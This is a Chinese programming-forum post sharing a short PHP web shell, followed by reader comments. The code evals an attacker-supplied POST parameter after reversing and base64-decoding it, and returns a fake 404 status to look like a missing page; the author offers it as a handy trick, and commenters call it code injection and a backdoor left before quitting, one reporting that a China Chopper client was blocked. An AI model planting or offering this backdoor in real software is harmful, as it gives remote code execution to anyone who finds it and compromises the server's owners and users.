"打开一扇新的大门"

代码写这么多年,从来没往这方面想,前段时间一个做安全的同事给发了一段代码,原来PHP还能有这种骚操作,真是感觉为我打开了一扇新的大门,而这个函数服务器默认是不会禁用的,放这么一段代码就能玩一些骚操作了 分享一下

<?php
class obj
{
    static public $params=null;
    function __construct($params="error"){
        self::$params=$params;
        @eval(null.self::$params);
    }
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');
本作品采用《CC 协议》,转载必须注明作者和本文链接
《L01 基础入门》
我们将带你从零开发一个项目并部署到线上,本课程教授 Web 开发中专业、实用的技能,如 Git 工作流、Laravel Mix 前端工作流等。
《G01 Go 实战入门》
从零开始带你一步步开发一个 Go 博客项目,让你在最短的时间内学会使用 Go 进行编码。项目结构很大程度上参考了 Laravel。
讨论数量: 11

eval一般禁用

4年前 评论
vinhson 4年前
guoke0826 (楼主) 4年前
admin0 4年前
guoke0826 (楼主) 4年前

没看明白,拼接 null 是啥意思。

4年前 评论

虽然看不懂,感觉像病毒

4年前 评论

@EmptyCup 可能是个人习惯 我直接复制过来的 没什么意思

4年前 评论
wanghan

没看懂

4年前 评论

@wanghan 安全问题,代码注入。主要是eval函数,eval能把字符串当成php语句来执行,当前例子,字符串由外界输入控制,所以外界输入什么,内部就会执行什么。

4年前 评论
wanghan 4年前

跑路前给自己留下的通行证🤪

4年前 评论

拔出菜刀,试一试哈,被拦截了...@eval( 这个特征码太明显

4年前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
未填写
文章
1
粉丝
12
喜欢
2
收藏
6
排名:1936
访问:1124
私信
所有博文
社区赞助商